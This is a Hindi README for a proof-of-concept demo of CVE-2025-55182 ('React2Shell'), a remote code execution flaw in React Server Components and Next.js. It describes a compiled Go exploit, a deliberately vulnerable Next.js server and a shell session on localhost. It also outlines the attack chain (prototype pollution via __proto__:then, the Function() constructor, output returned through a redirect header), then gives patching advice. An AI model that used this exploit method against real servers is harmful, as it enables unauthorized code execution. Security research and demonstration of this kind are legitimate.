
यह प्रोजेक्ट CVE-2025-55182 (React2Shell) का पूर्ण कार्यात्मक प्रदर्शन प्रदान करता है - React सर्वर घटकों और Next.js में एक महत्वपूर्ण रिमोट कोड निष्पादन भेद्यता।
यह प्रोजेक्ट CVE-2025-55182 (React2Shell) का पूरी तरह कार्यशील प्रदर्शन प्रदान करता है - रिएक्ट सर्वर कंपोनेंट्स और Next.js में एक महत्वपूर्ण रिमोट कोड निष्पादन भेद्यता।
स्थिति: ✅ कार्यशील - कमजोर सर्वरों पर वास्तविक कमांड निष्पादन प्राप्त करता है
CVE-2025-55182 (7.8MB संकलित निष्पादन योग्य)📥 डेमो वीडियो डाउनलोड करें (5.6MB) - क्लिक करें और एक्सप्लॉइट को क्रियान्वित देखें
डेमो में क्या दिखाया गया है:
cd exploited-server
npm run dev
# सर्वर http://localhost:3001 पर शुरू होता है
cd /Users/subh/Desktop/code-playground/react-2-shell-demo
./CVE-2025-55182
# पूछे जाने पर:
Target: localhost:3001
मूल कमांड:
subh@rce $ whoami
subh@rce $ pwd
subh@rce $ ls -la
subh@rce $ hostname
फ़ाइल संचालन:
subh@rce $ touch hello.txt
[+] बनाई गई: hello.txt
subh@rce $ vi hello.txt
[i] नई सामग्री दर्ज करें (समाप्त करने के लिए एक अलग पंक्ति पर 'EOF' टाइप करें):
Hello World!
EOF
[+] फ़ाइल सहेजी गई: hello.txt
subh@rce $ cat hello.txt
Hello World!
subh@rce $ echo "नई सामग्री" > hello.txt
[+] फ़ाइल लिखी गई
subh@rce $ rm hello.txt
[+] हटाया गया: hello.txt
सिस्टम जानकारी:
subh@rce $ cat package.json
subh@rce $ node --version
subh@rce $ npm --version
subh@rce $ ps aux
बाहर निकलें:
subh@rce $ exit
यह प्रोजेक्ट प्रदर्शित करता है:
✅ वास्तविक शोषण - कमजोर सिस्टम पर वास्तविक कार्यशील RCE
✅ सुरक्षा अनुसंधान - आधुनिक वेब फ्रेमवर्क की कमजोरियों को समझना
✅ Go विकास - सुरक्षा उपकरणों को संकलित और उपयोग करना
✅ भेद्यता विश्लेषण - CVE अनुसंधान और शोषण तकनीक
✅ जिम्मेदार प्रकटीकरण - नैतिक सुरक्षा परीक्षण प्रथाएँ
react-2-shell-demo/
├── CVE-2025-55182 # संकलित Go एक्सप्लॉइट बाइनरी
├── main.go # Go स्रोत कोड
├── exploited-server/ # कमजोर Next.js ऐप
│ ├── app/
│ │ ├── actions.ts # सर्वर एक्शन (कमजोर)
│ │ └── page.tsx # चेतावनी UI
│ └── package.json # Next 15.0.1, React 19.0.0
└── *.md # दस्तावेज़ीकरण
CVE-2025-55182 रिएक्ट सर्वर कंपोनेंट्स में असुरक्षित डिसीरियलाइज़ेशन का शोषण करता है:
__proto__ के माध्यम से प्रोटोटाइप प्रदूषणFunction() कंस्ट्रक्टर को आमंत्रित करते हैं1. दुर्भावनापूर्ण चंक के साथ मल्टीपार्ट पेलोड तैयार करें
2. Next.js सर्वर एक्शन एंडपॉइंट पर भेजें
3. __proto__:then के माध्यम से प्रोटोटाइप प्रदूषण ट्रिगर करें
4. कमांड के साथ Function() कंस्ट्रक्टर आमंत्रित करें
5. कोड निष्पादित करें और रीडायरेक्ट के माध्यम से आउटपुट लौटाएं
6. X-Action-Redirect हेडर से परिणाम पार्स करें
महत्वपूर्ण सूचनाएं:
README.md - यह फ़ाइलGO_EXPLOIT_USAGE.md - विस्तृत एक्सप्लॉइट उपयोगVULNERABLE_SERVER.md - सर्वर सेटअप गाइडEXPLOITATION_GUIDE.md - तकनीकी गहन जानकारीUSAGE.md - उपयोग उदाहरण और कमांडexploited-server में npm run dev)./CVE-2025-55182)यह प्रोजेक्ट सफलतापूर्वक प्रदर्शित करता है:
उत्पादन सिस्टम के लिए:
तुरंत अपडेट करें पैच किए गए संस्करणों पर:
रहस्य घुमाएं यदि 4 दिसंबर, 2025 से पहले उजागर हुए हों
लॉग की निगरानी करें संदिग्ध सर्वर एक्शन गतिविधि के लिए
एप्लिकेशन का ऑडिट करें जो सर्वर कंपोनेंट्स का उपयोग करते हैं
@subhdotsol - शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए
यह कोड शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है।
याद रखें: परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें। जिम्मेदारी से उपयोग करें! 🔒